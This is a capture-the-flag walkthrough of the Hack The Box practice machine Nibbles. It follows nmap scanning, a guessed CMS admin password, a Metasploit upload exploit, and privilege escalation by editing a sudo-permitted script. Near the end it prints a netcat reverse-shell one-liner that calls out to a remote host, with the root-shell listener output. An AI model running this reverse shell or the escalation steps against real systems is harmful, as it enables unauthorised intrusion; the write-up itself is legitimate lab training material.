hack the box walkthrough – Nibbles machine
Here we go again with a new walkthrough for the Hack The Box machine Nibbles!
It is an easy linux machine created by mrb3n beginning of 2018
Let’s jump it!
As usual, we start with our nmap enumeration scan to find out what we are dealing with:
[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.69.238 Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-18 17:54 EST Nmap scan report for 10.129.69.238 Host is up (0.035s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds
I checked first the port 80 which an apache web server is listening:
Looking on the source code, I found a comment which let us know that a directory /nibbleblog/ is existing
It brings me to a nibble CMS blog
I found on github the source code of the Nibbleblog then could found interresting information of our target.
First on the page update.php, the version installed is displayed:
Second on the config.xml I could discovered a potential admin user:
Third the file users.xml showed me that there is a sort of IP blacklist after 5 unsuccessful login attempts:
It means no brute force.. Let’s try to login with a pinch of salt then..
The login page is admin.php and I just tried with the user found in config.xml “admin” and a keyword found on the blog..
Bingo with admin / nibbles !!
Looking then for an exploit with searchsploit I found one matching with our version to use with Metasploit:
Let’s give it a try:
Bingo ! we have our shell!
Looking in the /home/nibbler folder I found out an archive personal.zip. I unzipped it with the following command:
[email protected]:/home/nibbler$ ls ls personal.zip user.txt [email protected]:/home/nibbler$ unzip personal.zip unzip personal.zip Archive: personal.zip creating: personal/ creating: personal/stuff/ inflating: personal/stuff/monitor.sh
Looks like a legitimate script for having basic information on the host:
Internet: Disconnected Operating System Type : GNU/Linux OS Name : Ubuntu UBUNTU_CODENAME=xenial OS Version : 16.04.3 LTS (Xenial Xerus) Architecture : x86_64 Kernel Release : 4.4.0-104-generic Hostname : Nibbles Internal IP : 10.129.69.238 dead:beef::250:56ff:feb9:92f9 External IP : Name Servers : DO 18.104.22.168 22.214.171.124 Logged In users : Ram Usages : total used free shared buff/cache available Mem: 974M 231M 226M 10M 516M 560M Swap Usages : total used free shared buff/cache available Swap: 1.0G 0B 1.0G Disk Usages : Filesystem Size Used Avail Use% Mounted on /dev/sda1 472M 133M 330M 29% /boot Load Average : 0.00,0.00,0.00 System Uptime Days/(HH:MM) : 2:10
What I found then with the command sudo -l is that I can execute this script with root permission without password:
[email protected]:/home/nibbler/personal/stuff$ sudo -l sudo -l sudo: unable to resolve host Nibbles: Connection timed out Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
Well, let’s edit the script to run a reverse shell with root right.
I watched the nc version installed on the target and create my command accordingly for OpenBSD:
which nc /bin/nc nc -h OpenBSD netcat (Debian patchlevel 1.105-7ubuntu1) This is nc from the netcat-openbsd package. An alternative nc is available in the netcat-traditional package. usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length] [-P proxy_username] [-p source_port] [-q seconds] [-s source] [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
Then I finished by creating a listener on my Kali machine and ran the script with the command:
[email protected]:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
Then I was root!
[email protected]:~/Documents$ nc -lvnp 4242 listening on [any] 4242 ... connect to [10.10.14.105] from (UNKNOWN) [10.129.69.238] 32856 # whoami root # cd /root # ls root.txt